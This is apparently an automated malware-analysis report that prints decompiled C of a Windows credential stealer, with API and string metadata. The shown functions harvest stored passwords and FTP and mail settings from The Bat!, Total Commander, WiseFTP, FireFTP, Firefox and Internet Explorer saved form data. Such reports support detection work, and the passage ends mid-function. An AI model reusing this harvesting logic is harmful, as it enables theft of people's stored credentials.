                                                                        • Instruction Fuzzy Hash: 3821D5B1644504B9EB113B21CC06FEE3E1A9B90314F20803BBA05B95F3D7BC5EC1969E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040EFFB(intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr* _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				intOrPtr _t36;
                                                                        				intOrPtr _t37;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t40;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t43;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t53;
                                                                        				void* _t62;
                                                                        
                                                                        				_t36 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "Working Directory", 0); // executed
                                                                        				_t37 = _t36;
                                                                        				if(_t37 != 0) {
                                                                        					_v8 = _t37;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t38 = E00401C8E(_a8, "Software\\RIT\\The Bat!", "ProgramDir", 0); // executed
                                                                        				_t39 = _t38;
                                                                        				if(_t39 != 0) {
                                                                        					_v8 = _t39;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t40 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Default", 0); // executed
                                                                        				_t41 = _t40;
                                                                        				if(_t41 != 0) {
                                                                        					_v8 = _t41;
                                                                        					E0040EF86(_a4, _v8);
                                                                        					E004017D5(_v8);
                                                                        				}
                                                                        				_t43 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot", "Count",  &_v16); // executed
                                                                        				_t44 = _t43;
                                                                        				if(_t44 != 0) {
                                                                        					_v12 = _t44;
                                                                        					if(_v16 != 4) {
                                                                        						L17:
                                                                        						return E004017D5(_v12);
                                                                        					}
                                                                        					_t47 =  *_v12;
                                                                        					if(_t47 > 0x2710) {
                                                                        						_t47 = 0x2710;
                                                                        					}
                                                                        					_v20 = _t47;
                                                                        					while(_v20 != 0) {
                                                                        						wsprintfA( &_v60, "Dir #%d", _v20);
                                                                        						_t62 = _t62 + 0xc;
                                                                        						_t53 = E00401C8E(_a8, "Software\\RIT\\The Bat!\\Users depot",  &_v60,  &_v64);
                                                                        						if(_t53 != 0) {
                                                                        							_v8 = _t53;
                                                                        							if(_v64 > 3) {
                                                                        								E0040EF86(_a4, _v8);
                                                                        							}
                                                                        							E004017D5(_v8);
                                                                        						}
                                                                        						_v20 = _v20 - 1;
                                                                        					}
                                                                        					goto L17;
                                                                        				}
                                                                        				return _t44;
                                                                        			}





















                                                                        APIs
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        • wsprintfA.USER32 ref: 0040F0D0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeLocalwsprintf
                                                                        • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                                        • API String ID: 988369812-1921698578
                                                                        • Opcode ID: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
                                                                        • Instruction ID: efec917b93c5790ddd6963f177ddc18cbde9d62d709c2f7ca4761b08757c98aa
                                                                        • Opcode Fuzzy Hash: e7641b05bf45e17f9eea9babc3caff15f1089f258b85627ad0d9a1ba99dade6e
                                                                        • Instruction Fuzzy Hash: 5F310771E40109FADF21AFA1DC42ADD7B72AB00304F244477B814B65E1E77A9BA4AB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00404A31(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				CHAR* _v12;
                                                                        				intOrPtr _v16;
                                                                        				int _t37;
                                                                        				void* _t39;
                                                                        				void* _t41;
                                                                        				void* _t42;
                                                                        				void* _t43;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				void* _t47;
                                                                        				intOrPtr _t50;
                                                                        				void* _t51;
                                                                        				intOrPtr _t54;
                                                                        				void* _t55;
                                                                        				intOrPtr _t57;
                                                                        				intOrPtr _t58;
                                                                        				void* _t59;
                                                                        				intOrPtr _t61;
                                                                        				intOrPtr _t62;
                                                                        				void* _t79;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_v8 = E0040150D(_a4, 2, 0);
                                                                        				"_cx_ftp.ini" = 0x77;
                                                                        				M004149B3 = 0x47;
                                                                        				"_hisler\\Total Commander" = 0x47;
                                                                        				_v12 = E004017EC(0x105);
                                                                        				_t37 = GetWindowsDirectoryA(_v12, 0x104);
                                                                        				if(_t37 == 0) {
                                                                        					L3:
                                                                        					E004017D5(_v12);
                                                                        				} else {
                                                                        					_t82 = _t37 - 0x104;
                                                                        					if(_t37 > 0x104) {
                                                                        						goto L3;
                                                                        					} else {
                                                                        						E004048FE(_a4, _v12); // executed
                                                                        					}
                                                                        				}
                                                                        				_t39 = E00401DCE(_t82, 0x28); // executed
                                                                        				E004048FE(_a4, _t39); // executed
                                                                        				_t41 = E00401DCE(_t82, 0x1a); // executed
                                                                        				_t42 = _t41;
                                                                        				_t83 = _t42;
                                                                        				if(_t42 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t42, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t43 = E00401DCE(_t83, 0x23); // executed
                                                                        				_t44 = _t43;
                                                                        				_t84 = _t44;
                                                                        				if(_t44 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t44, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t45 = E00401DCE(_t84, 0x1c); // executed
                                                                        				_t46 = _t45;
                                                                        				if(_t45 != 0) {
                                                                        					E004048FE(_a4, E00401D69(_t46, "\\GHISLER")); // executed
                                                                        				}
                                                                        				_t47 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t47);
                                                                        				_t50 = E00401C8E( *0x4140fe, "Software\\_hisler\\Windows Commander", "FtpIniName", 0);
                                                                        				if(_t50 != 0) {
                                                                        					_v16 = _t50;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t51 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t51);
                                                                        				_t54 = E00401C8E( *0x4140fe, "Software\\_hisler\\Total Commander", "FtpIniName", 0);
                                                                        				if(_t54 != 0) {
                                                                        					_v16 = _t54;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t55 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t55);
                                                                        				_t57 = E00401C8E(0x80000002, "Software\\_hisler\\Windows Commander", "FtpIniName", 0); // executed
                                                                        				_t58 = _t57;
                                                                        				if(_t58 != 0) {
                                                                        					_v16 = _t58;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				_t59 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "InstallDir", 0); // executed
                                                                        				E004048FE(_a4, _t59);
                                                                        				_t61 = E00401C8E(0x80000002, "Software\\_hisler\\Total Commander", "FtpIniName", 0); // executed
                                                                        				_t62 = _t61;
                                                                        				_t89 = _t62;
                                                                        				if(_t62 != 0) {
                                                                        					_v16 = _t62;
                                                                        					E004048E7(_a4, _v16);
                                                                        					E004017D5(_v16);
                                                                        				}
                                                                        				return E00401553(_t79, _t89, _a4, _v8);
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404A70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocDirectoryLocalWindows
                                                                        • String ID: FtpIniName$InstallDir$Software\_hisler\Total Commander$Software\_hisler\Windows Commander$\GHISLER
                                                                        • API String ID: 3186838798-174342358
                                                                        • Opcode ID: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
                                                                        • Instruction ID: af35828189b00225af904a715eab3383fb197f901e28e357ccde0e703416f596
                                                                        • Opcode Fuzzy Hash: e44d222ac4209ebfcdeb2c633a21f0fa05b539985e7ea41fea4a72b497d11a38
                                                                        • Instruction Fuzzy Hash: BD5156F5AA4249BAEF013BB2CD03FAD7E659F80748F10803B7614740F1DABD8950AA5C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 52%
                                                                        			E0040A364(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
                                                                        				char _v24;
                                                                        				char _v44;
                                                                        				signed int _v48;
                                                                        				intOrPtr _v52;
                                                                        				char _v56;
                                                                        				intOrPtr _v60;
                                                                        				void* _v64;
                                                                        				char _v68;
                                                                        				void* _v72;
                                                                        				char _v76;
                                                                        				void* _v80;
                                                                        				char _v84;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr _t67;
                                                                        				void* _t80;
                                                                        				signed int _t81;
                                                                        				void* _t84;
                                                                        				void* _t85;
                                                                        
                                                                        				_t80 = __ecx;
                                                                        				_t50 = lstrlenW(_a8);
                                                                        				if(_t50 != 0) {
                                                                        					E00403459(_t80, _a8, (_t50 << 1) + 2,  &_v24);
                                                                        					_t81 = 0;
                                                                        					_v48 = 0;
                                                                        					while(_t81 < 0x14) {
                                                                        						_v48 = _v48 + ( *(_t81 +  &_v24) & 0x000000ff);
                                                                        						_t81 = _t81 + 1;
                                                                        					}
                                                                        					_t84 = 0;
                                                                        					_v52 = 0;
                                                                        					while(_t84 < 0x14) {
                                                                        						_push( *(_t84 +  &_v24) & 0x000000ff);
                                                                        						wsprintfA( &_v44, "%02X");
                                                                        						_t85 = _t85 + 0xc;
                                                                        						_v52 = E00401D69(_v52,  &_v44);
                                                                        						_t84 = _t84 + 1;
                                                                        					}
                                                                        					_v48 = _v48 & 0x000000ff;
                                                                        					_push(_v48);
                                                                        					wsprintfA( &_v44, "%02X");
                                                                        					_v52 = E00401D69(_v52,  &_v44);
                                                                        					_t66 = E00401C8E( *0x4140fe, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
                                                                        					_t67 = _t66;
                                                                        					if(_t67 != 0) {
                                                                        						_v60 = _t67;
                                                                        						if(_v56 != 0) {
                                                                        							_v84 = (lstrlenW(_a8) << 1) + 2;
                                                                        							_push(_a8);
                                                                        							_pop( *_t30);
                                                                        							_push(_v56);
                                                                        							_pop( *_t32);
                                                                        							_push(_v60);
                                                                        							_pop( *_t34);
                                                                        							_v72 = 0;
                                                                        							if( *0x41442d != 0) {
                                                                        								_push( &_v76);
                                                                        								_push(1);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_push( &_v84);
                                                                        								_push(0);
                                                                        								_push( &_v68);
                                                                        								if( *0x41442d() != 0 && _v72 != 0) {
                                                                        									if(_a12 != 0) {
                                                                        										 *_a12 = 0x3f;
                                                                        									}
                                                                        									E0040A13B(0xbeef0003, _a8, _v72, _v76, _a4);
                                                                        									LocalFree(_v72);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						E004017D5(_v60);
                                                                        					}
                                                                        					return E004017D5(_v52);
                                                                        				} else {
                                                                        					return _t50;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?), ref: 0040A36E
                                                                        • wsprintfA.USER32 ref: 0040A3EB
                                                                        • lstrlenW.KERNEL32(?,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,?,?,?,?,?,?), ref: 0040A431
                                                                        • LocalFree.KERNEL32(00000000,?,?), ref: 0040A4AB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$FreeLocalwsprintf
                                                                        • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                        • API String ID: 63427805-2450551051
                                                                        • Opcode ID: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction ID: ee62826d35bb7334c94dec01f225b0295fce8fff2f3ff85087ea3677e24ce983
                                                                        • Opcode Fuzzy Hash: 10276d0c1c107ec45e6a45a57df5954478425b079aa56ba185906d5e51d0d003
                                                                        • Instruction Fuzzy Hash: BF414972810218EBDF119BE1EC45BEEBB79AF08314F04403AF910B51A1E7B89965DB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004046FB(intOrPtr _a4, char* _a8) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				intOrPtr _v2080;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        
                                                                        				_t38 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
                                                                        				_t39 = _t38;
                                                                        				if(_t39 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a8, "\\"),  &_v2064);
                                                                        						E004017D5(_t44);
                                                                        						_v2080 = E00401C8E( *0x4140fe, _v2068, "Password", 0);
                                                                        						_v2072 = E00401C8E( *0x4140fe, _v2068, "HostName", 0);
                                                                        						_v2076 = E00401C8E( *0x4140fe, _v2068, "User", 0);
                                                                        						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                        							E00401486(_a4, 0xbeef0000);
                                                                        							E004014E8(_a4, _v2072);
                                                                        							E004014E8(_a4, _v2076);
                                                                        							E004014E8(_a4, _v2080);
                                                                        						}
                                                                        						E004017D5(_v2080);
                                                                        						E004017D5(_v2072);
                                                                        						E004017D5(_v2076);
                                                                        						E004046FB(_a4, _v2068);
                                                                        						E004017D5(_v2068);
                                                                        						_v12 = _v12 + 1;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t39;
                                                                        			}














                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?), ref: 00404711
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00404745
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040486C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: HostName$Password$User
                                                                        • API String ID: 1332880857-1253078594
                                                                        • Opcode ID: 34796f9fa72e5c0a8b603da2951ed1159b3a108f4c29e927ee022d429b90114d
                                                                        • Instruction ID: 274f6807b80e73b8c345a4adb4ff243209de0c90348e176c4e7a203eb37303a1
                                                                        • Opcode Fuzzy Hash: 34796f9fa72e5c0a8b603da2951ed1159b3a108f4c29e927ee022d429b90114d
                                                                        • Instruction Fuzzy Hash: 0C31077194011CBADF216FA2CC42BDD7AB9BF44304F10C0BAB644751B1EBB95A929F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00408C47(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v2064;
                                                                        				intOrPtr _v2068;
                                                                        				intOrPtr _v2072;
                                                                        				intOrPtr _v2076;
                                                                        				long _t34;
                                                                        				long _t35;
                                                                        				intOrPtr _t46;
                                                                        				intOrPtr _t50;
                                                                        				void* _t57;
                                                                        
                                                                        				_t57 = __ecx;
                                                                        				_t34 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				_t35 = _t34;
                                                                        				if(_t35 == 0) {
                                                                        					_v12 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
                                                                        						E004017D5(_t40);
                                                                        						_v2072 = E00401C8E(_a8, _v2068, 0, 0);
                                                                        						_t46 = E0040234A(__eflags, _v2072);
                                                                        						__eflags = _t46;
                                                                        						if(_t46 == 0) {
                                                                        							L8:
                                                                        							E004017D5(_v2072);
                                                                        							E00408C47(_t57, _a4, _a8, _v2068);
                                                                        							E004017D5(_v2068);
                                                                        							_v12 = _v12 + 1;
                                                                        							continue;
                                                                        						}
                                                                        						_push(_t46);
                                                                        						_v2076 = _t46;
                                                                        						_t50 = E00401E9C(_v2076);
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							E00404131(_a4, _v2076, "wiseftpsrvs.ini", 0xbeef0002);
                                                                        							E00404131(_a4, _v2076, "wiseftp.ini", 0xbeef0002);
                                                                        							E00404131(_a4, _v2076, "wiseftpsrvs.bin", 0xbeef0000);
                                                                        						}
                                                                        						E004017D5();
                                                                        						goto L8;
                                                                        					}
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        				return _t35;
                                                                        			}
















                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 00408C8E
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CloseEnumOpen
                                                                        • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                                        • API String ID: 1332880857-3184955129
                                                                        • Opcode ID: 9b7b45d8c3723c3143dadf0c42a641b027867ae380e8a0435a1087aadd676337
                                                                        • Instruction ID: 6933cf3e983a815ab224151528d9636a50beec05a79b4a1705713022bd00aa48
                                                                        • Opcode Fuzzy Hash: 9b7b45d8c3723c3143dadf0c42a641b027867ae380e8a0435a1087aadd676337
                                                                        • Instruction Fuzzy Hash: 2B31287190010CBADF216F61CD42FDDBABABF50304F1080BAB684B51E1DE799A919F98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409A1D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v269;
                                                                        				void* _t12;
                                                                        				void* _t23;
                                                                        				void* _t24;
                                                                        
                                                                        				_t24 = __edx;
                                                                        				_t23 = __ecx;
                                                                        				_v8 = E0040150D(_a4, 0x25, 0);
                                                                        				_t12 = E00401DCE(__eflags, 0x1a);
                                                                        				_t26 = _t12;
                                                                        				if(_t12 != 0) {
                                                                        					E00404131(_a4, E00401D69(_t12, "\\Mozilla\\Firefox\\"), "fireFTPsites.dat", 0xbeef1000); // executed
                                                                        					E004017D5(_t20);
                                                                        				}
                                                                        				 *0x415824 = 1;
                                                                        				GetCurrentDirectoryA(0x104,  &_v269);
                                                                        				E0040988E(_t23, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				E0040988E(_t23, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
                                                                        				SetCurrentDirectoryA( &_v269);
                                                                        				return E00401553(_t24, _t26, _a4, _v8);
                                                                        			}









                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409A7A
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409ABF
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                                        • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                                        • API String ID: 3007406096-624000163
                                                                        • Opcode ID: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
                                                                        • Instruction ID: 60e21d86f469014f8f7ff040f91813a7819b2797126ab95d7269fae31e95df33
                                                                        • Opcode Fuzzy Hash: 5764e6e8ef470ff0ed49208cfaf5de5449351cf3b9563aac8ac0db6f1d2449a4
                                                                        • Instruction Fuzzy Hash: 24017570641608FEEF117FA1CC47FC93A699F84748F104037B608B51E2EABD59E0966C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0040988E(void* __ecx, intOrPtr _a4, void* _a8, char* _a12, char* _a16, intOrPtr _a20) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				long _t37;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        				intOrPtr _t51;
                                                                        				void* _t59;
                                                                        
                                                                        				_t59 = __ecx;
                                                                        				if(StrStrIA(_a12, _a16) != 0) {
                                                                        					_t48 = E00401C8E(_a8, _a12, "PathToExe", 0); // executed
                                                                        					_t49 = _t48;
                                                                        					_t61 = _t49;
                                                                        					if(_t49 != 0) {
                                                                        						_push(_t49);
                                                                        						_t51 = E0040234A(_t61, _t49);
                                                                        						_t62 = _t51;
                                                                        						if(_t51 != 0) {
                                                                        							_v28 = _t51;
                                                                        							_t54 = E00401DCE(_t62, 0x1a);
                                                                        							if(E00401DCE(_t62, 0x1a) != 0) {
                                                                        								E00409713(_a4, E00401D69(_t54, _a20), _v28);
                                                                        								E004017D5(_t56);
                                                                        							}
                                                                        							E004017D5(_v28);
                                                                        						}
                                                                        						E004017D5();
                                                                        					}
                                                                        				}
                                                                        				_v12 = E004017EC(0x800);
                                                                        				_t37 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                        				if(_t37 == 0) {
                                                                        					_v20 = 0;
                                                                        					while(1) {
                                                                        						_v16 = 0x7ff;
                                                                        						if(RegEnumKeyExA(_v8, _v20, _v12,  &_v16, 0, 0, 0, 0) != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_v24 = E00401D69(E00401D15(_a12, "\\"), _v12);
                                                                        						E0040988E(_t59, _a4, _a8, _v24, _a16, _a20);
                                                                        						E004017D5(_v24);
                                                                        						_v20 = _v20 + 1;
                                                                        					}
                                                                        					RegCloseKey(_v8);
                                                                        				}
                                                                        				return E004017D5(_v12);
                                                                        			}














                                                                        APIs
                                                                        • StrStrIA.SHLWAPI(?,?), ref: 0040989A
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0040993D
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
                                                                          • Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
                                                                          • Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
                                                                          • Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                          • Part of subcall function 00401D69: lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                          • Part of subcall function 00401D69: lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                          • Part of subcall function 00401D69: lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                                        • String ID: PathToExe
                                                                        • API String ID: 3012581338-1982016430
                                                                        • Opcode ID: 0a33e97ccaf1ba2b7b7e5bf0642aba39ef90e638a46a30579a0fb42161cfd6fc
                                                                        • Instruction ID: 9921fcbb10fb3e88fa5f2a06c9976cc3b0665bb7c53d4c2d3e03b44b5fdf6235
                                                                        • Opcode Fuzzy Hash: 0a33e97ccaf1ba2b7b7e5bf0642aba39ef90e638a46a30579a0fb42161cfd6fc
                                                                        • Instruction Fuzzy Hash: 65310C7291010EBBDF116FE2CC42FEE7A75AF04304F10403AB610B51F2DA799D61AB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E00402725(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				char _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				char _v277;
                                                                        				void* _t23;
                                                                        				void* _t24;
                                                                        				long _t27;
                                                                        				void* _t35;
                                                                        				void* _t36;
                                                                        				void** _t41;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				void* _t51;
                                                                        				void* _t53;
                                                                        
                                                                        				_t53 = __edx;
                                                                        				_t23 = E00401C8E( *0x4140fe, "Software\\WinRAR", _a4, _a8); // executed
                                                                        				_t24 = _t23;
                                                                        				if(_t24 != 0) {
                                                                        					return _t24;
                                                                        				}
                                                                        				_t51 = 0;
                                                                        				_t27 = GetTempPathA(0x104,  &_v277);
                                                                        				if(_t27 == 0 || _t27 > 0x104) {
                                                                        					L12:
                                                                        					return _t51;
                                                                        				} else {
                                                                        					E00401000( &_v8, _t53,  &_v8);
                                                                        					if(E004024D7( &_v277) != 0) {
                                                                        						_t35 = E00401D15( &_v277, _a4);
                                                                        					} else {
                                                                        						_t35 = E00401D69(E00401D15( &_v277, "\\"), _a4);
                                                                        					}
                                                                        					_push(_t35);
                                                                        					_t36 = E004011D5(_t35, _t53, _t35, _v8); // executed
                                                                        					_t37 = _t36;
                                                                        					if(_t36 != 0) {
                                                                        						_v12 = E0040106A(_t37, _t53, _v8);
                                                                        						if(_v12 != 0) {
                                                                        							_t41 =  &_v16;
                                                                        							_push(_t41);
                                                                        							_push(_v8);
                                                                        							L00410DBE();
                                                                        							if(_t41 >= 0) {
                                                                        								_t43 = GlobalLock(_v16);
                                                                        								if(_t43 != 0) {
                                                                        									_t51 = E004017EC(_v12);
                                                                        									_t45 = _t43;
